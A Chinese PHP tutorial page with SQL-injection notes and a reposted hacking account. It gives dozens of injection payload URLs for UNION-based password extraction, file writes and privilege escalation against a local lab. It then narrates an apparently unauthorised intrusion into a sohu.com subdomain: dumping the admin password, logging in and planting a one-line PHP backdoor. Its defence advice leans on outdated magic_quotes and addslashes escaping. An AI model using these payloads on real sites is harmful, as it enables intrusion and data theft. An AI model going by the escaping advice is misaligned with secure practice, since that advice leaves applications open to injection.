PHP的SQL注入过程分析_PHP教程-php教程-PHP中文网

首页

后端开发

php教程

PHP的SQL注入过程分析_PHP教程

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jul 21, 2016 pm 03:22 PM

phpsql。分析基本学习技能注入的过程

今天从网上学习了有关SQL注入的基本技能。SQL注入的重点就是构造SQL语句，只有灵活的运用SQL
　　语句才能构造出牛比的注入字符串。学完之后写了点笔记，已备随时使用。希望你在看下面内容时先了
　　解SQL的基本原理。笔记中的代码来自网络。
　　===基础部分===
　　本表查询：
　　http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6
　　http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m
　　Union联合语句：
　　http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user/*
　　http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*
　　导出文件：
　　http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt
　　http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt
　　http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt
　　INSERT语句：
　　INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
　　构造homepage值为：http://4ngel.net', '3')#
　　SQL语句变为：INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3')#', '1');
　　UPDATE语句：我喜欢这样个东西
　　先理解这句SQL
　　UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'
　　如果此SQL被修改成以下形式，就实现了注入
　　1：修改homepage值为
　　http://4ngel.net', userlevel='3
　　之后SQL语句变为
　　UPDATE user SET password='mypass', homepage='http://4ngel.net', userlevel='3' WHERE id='$id'
　　userlevel为用户级别
　　2:修改password值为
　　mypass)' WHERE username='admin'#
　　之后SQL语句变为
　　UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'
　　3：修改id值为
　　' OR username='admin'
　　之后SQL语句变为
　　UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'
　　===高级部分===
　　常用的MySQL内置函数
　　DATABASE()
　　USER()
　　SYSTEM_USER()
　　SESSION_USER()
　　CURRENT_USER()
　　database()
　　version()
　　SUBSTRING()
　　MID()
　　char()
　　load_file()
　　……
　　函数应用
　　UPDATE article SET title=DATABASE() WHERE id=1
　　http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()
　　SELECT * FROM user WHERE username=char(97,110,103,101,108)
　　# char(97,110,103,101,108) 相当于angel，十进制
　　http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)
　　http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111
　　确定数据结构的字段个数及类型
　　http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1
　　http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)
　　猜数据表名
　　http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from members
　　跨表查询得到用户名和密码
　　http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
　　其他
　　#验证第一位密码
　　http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49
　　===注入防范===
　　服务器方面
　　magic_quotes_gpc设置为On
　　display_errors设置为Off
　　编码方面
　　$keywords = addslashes($keywords);
　　$keywords = str_replace("_","\_",$keywords);
　　$keywords = str_replace("%","\%",$keywords);
　　数值类型
　　使用intval()抓换
　　字符串类型
　　SQL语句参数中要添加单引号
　　下面代码，用于防治注入
　　if (get_magic_quotes_gpc()) {
　　//....
　　}else{
　　$str = mysql_real_escape_string($str);
　　$keywords = str_replace("_","\_",$keywords);
　　$keywords = str_replace("%","\%",$keywords);
　　}
　　有用的函数
　　stripslashes()
　　get_magic_quotes_gpc()
　　mysql_real_escape_string()
　　strip_tags()
　　array_map()
　　addslashes()
　　参考文章：
　　http://www.4ngel.net/article/36.htm (SQL Injection with MySQL)中文
　　http://www.phpe.net/mysql_manual/06-4.html(MYSQL语句参考)
　　对sohu.com的一次安全检测
　　已发表于黑客防线
　　发布在http://www.loveshell.net
　　sohu.com是国内一家比较大的门户网站，提供了包括邮箱在内的很多服务。这么大的一个网站，不出问题是很难的，俗话说服务越多越不安全嘛!无论是对于服务器还是网站都是这个道理，最近学习Mysql注入，于是顺便就对sohu.com做了一次小小的安全检测，看看它存不存在SQL注入漏洞。
　　看看sohu.com的主站发现差不多都是静态的，于是放弃了在主站上找问题的想法。直接在sohu.com的各个分站上浏览了一圈后发现，大部分网站采用的都是Php脚本，也有少数用的是jsp脚本，根据经验我们知道，对于Php构建的系统，一般后台数据库都是Mysql，就好象asp对应着Mssql一样，看来可能存在问题的地方还是很多的。由于Php的特性(Php默认将传递的参数中的'等字符做了转换，所以对于字符类型的变量默认情况下很难注入)，一般情况下我们注入的只能是数字类型的变量了。根据平时注入的知识，我们知道id=XXX这样的形式传递的参数一般都是数字类型的变量，所以我们只要去测试那些php?id=XXX的连接就可能找到漏洞了!通过一番仔细的搜索，还真让我在XXX.it.sohu.com上找到了一个存在问题的连接http://XXX.it.sohu.com/book/serialize.php?id=86
　　提交：
　　http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=1/*
　　返回正常如图1。
　　然后提交：
　　http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2/*
　　返回没有信息如图2，空空的吧，应该是SQL语句结果为空了。
　　通过这两个Url我们可以猜测漏洞是存在的，因为我们提交的and 1=1和and 1=2都被当作Sql语句执行啦!那么我们提交的其他语句也是可以执行的，这就是Sql注入了!我们还可以知道id这个变量是被当作数字处理的，没有放到 ''之间，否则我们是成功不了的哦!如果变量没有过滤Sql其他关键字的话，我们就很有可能成功啦!我遇到很多的情况都是变量过滤了select，在 mysql里就是死路了，好郁闷!
　　既然漏洞是存在的，让我们继续吧!首先当然是探测数据库的类型和连接数据库的帐户啦!权限高并且数据库和web同机器的话可以免除猜测字段的痛苦啦!提交：
　　http://XXX.it.sohu.com/book/serialize.php?id=86 and ord(mid(version(),1,1))>51/*
　　返回正常如图3，这个语句是看数据库的版本是不是高于3的，因为3的ASCII是51嘛!版本的第一个字符是大于51的话当然就是4.0以上啦!4.0以上是支持union查询的，这样就可以免除一位一位猜测的痛苦哦!这里结果为真，所以数据库是4.0以上的哦，可以支持union了。
　　既然支持union查询就先把这个语句的字段给暴出来吧!以后再用union查询什么都是很快的哦!提交：
　　http://XXX.it.sohu.com/book/serialize.php?id=86 order by 10/*
　　返回结果正常如图4，看来字段是大于10个的，继续提交：
　　http://XXX.it.sohu.com/book/serialize.php?id=86 order by 20/*
　　正常返回，提交：
　　http://XXX.it.sohu.com/book/serialize.php?id=86 order by 30/*
　　......
　　到order by 50的时候返回没有信息了!看来是大于40的小于50的，于是提交：
　　http://XXX.it.sohu.com/book/serialize.php?id=86 order by 45/*
　　......
　　终于猜测到字段是41左右啦!这里说是左右是因为有些字段是不能排序的，所以还需要我们用union精确定位字段数字是41，提交：
　　http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
　　返回结果如图5，哈哈，成功了哦!哪些字段会在页面显示也是一目了然了!现在让我们继续吧!提交：
　　http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
　　返回结果如图6，完成了数据库系统的探测哦!我们很有可能不是root，并且数据库服务器和web也很有可能不是在一台服务器，这样的话我们就没有file权限了!提交：
　　http://XXX.it.sohu.com/book/serialize.php?id=86 and (select count(*) from mysql.user)>0/*
　　返回结果如图7，没有对mysql的读取权限，更加确定权限不是root了!呵呵!
　　既然不是root，也不要气馁，让我们继续吧!在进一步猜测数据之前我们最好找下后台先，很多时候找到了管理员密码却找不到地方登陆，很郁闷的说!在根目录下加/admin和/manage/等等后台常用的地址都是返回404错误，猜测了几次终于在/book/目录下admin的时候出现了403 Forbiden错误，哈哈，是存在这个目录的!但是登陆页面死活也猜不出来，郁闷中!不过既然知道有个admin也好说，去Google里搜索：
　　admin site:sohu.com
　　如图8，得到了另外一个分站的论坛，我们知道人是很懒惰的，通常一个地方的后台的特征就很可能是整个网站的特征，所以当我尝试访问/book/admin /admuser.php的时候奇迹出现了，如图9，哈哈，离成功更近了哦!到这里我们知道了网站的后台，其实我们还可以得到很重要的信息，查看原文件发现登陆表单的名字是name和password，很容易推测出对方管理员表中的结构，即使不符合估计也差不多，呵呵!所以知道为什么我们要先猜测后台了吧!继续注入吧!提交：
　　http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from admin/*
　　返回错误，说明不存在admin这个表，尝试admins以及admin_user等等，最后提交：
　　http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
　　的时候返回成功，哈哈!有User这个表!那么是不是管理员表呢?字段又是什么呢?继续提交：
　　http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
　　返回空信息的错误，提交：
　　http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
　　返回结果如图10，哈哈正常返回并且出来了一个密码，应该是管理员表里第一个用户的密码!那么他的用户名字是什么呢?猜测很多字段都是返回错误，实在没有办法的时候输入一个ID，居然返回成功了!ID就是管理员的名字哦!提交：
　　http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,password,3,4,id,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
　　返回结果如图11，哈哈，得到管理员的名字了哦!激动地拿着管理员名字和密码去后台登陆成功了哦!如图12。现在是想想怎么拿webshell的时候了，在后台发现有上传图片的地方，但是当上传php文件的时候提示说不是图片文件，郁闷了!在后台仔细的乱七八糟的乱翻了会，发现有个生成php文件的功能，于是在里面插入了一句话的php后门，如图13，点生成之后提示成功了，看来如果没有过滤的话我们应该是得到webshell了，密码是a，用一句话后门连上去如图14，哈哈，成功了!脚本检测到此圆满完成!
　　在得到webshell之后我上服务器上看了看，发现服务器的安全是做得不错，执行不了命令，并且基本上所有的目录除了我们刚才上传的目录之外都是不可写的，不过作为脚本测试，得到了webshell也就算成功了吧!也可以看出，小小的一个参数没有过滤就可以导致网站的沦陷，特别是像sohu.com这样的大站，参数更多，更加要注意过滤方面的问题哦!

声明

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

PHP与Python：了解差异Apr 11, 2025 am 12:15 AM

PHP和Python各有优势，选择应基于项目需求。1.PHP适合web开发，语法简单，执行效率高。2.Python适用于数据科学和机器学习，语法简洁，库丰富。

php：死亡还是简单地适应？Apr 11, 2025 am 12:13 AM

PHP不是在消亡，而是在不断适应和进化。1)PHP从1994年起经历多次版本迭代，适应新技术趋势。2)目前广泛应用于电子商务、内容管理系统等领域。3)PHP8引入JIT编译器等功能，提升性能和现代化。4)使用OPcache和遵循PSR-12标准可优化性能和代码质量。

PHP的未来：改编和创新Apr 11, 2025 am 12:01 AM

PHP的未来将通过适应新技术趋势和引入创新特性来实现：1)适应云计算、容器化和微服务架构，支持Docker和Kubernetes；2)引入JIT编译器和枚举类型，提升性能和数据处理效率；3)持续优化性能和推广最佳实践。

您什么时候使用特质与PHP中的抽象类或接口？Apr 10, 2025 am 09:39 AM

在PHP中，trait适用于需要方法复用但不适合使用继承的情况。1)trait允许在类中复用方法，避免多重继承复杂性。2)使用trait时需注意方法冲突，可通过insteadof和as关键字解决。3)应避免过度使用trait，保持其单一职责，以优化性能和提高代码可维护性。

什么是依赖性注入容器（DIC），为什么在PHP中使用一个？Apr 10, 2025 am 09:38 AM

依赖注入容器（DIC）是一种管理和提供对象依赖关系的工具，用于PHP项目中。DIC的主要好处包括：1.解耦，使组件独立，代码易维护和测试；2.灵活性，易替换或修改依赖关系；3.可测试性，方便注入mock对象进行单元测试。

与常规PHP阵列相比，解释SPL SplfixedArray及其性能特征。Apr 10, 2025 am 09:37 AM

SplFixedArray在PHP中是一种固定大小的数组，适用于需要高性能和低内存使用量的场景。1)它在创建时需指定大小，避免动态调整带来的开销。2)基于C语言数组，直接操作内存，访问速度快。3)适合大规模数据处理和内存敏感环境，但需谨慎使用，因其大小固定。

PHP如何安全地上载文件？Apr 10, 2025 am 09:37 AM

PHP通过$\_FILES变量处理文件上传，确保安全性的方法包括：1.检查上传错误，2.验证文件类型和大小，3.防止文件覆盖，4.移动文件到永久存储位置。

什么是无效的合并操作员（??）和无效分配运算符（?? =）？Apr 10, 2025 am 09:33 AM

JavaScript中处理空值可以使用NullCoalescingOperator(??)和NullCoalescingAssignmentOperator(??=)。1.??返回第一个非null或非undefined的操作数。2.??=将变量赋值为右操作数的值，但前提是该变量为null或undefined。这些操作符简化了代码逻辑，提高了可读性和性能。

See all articles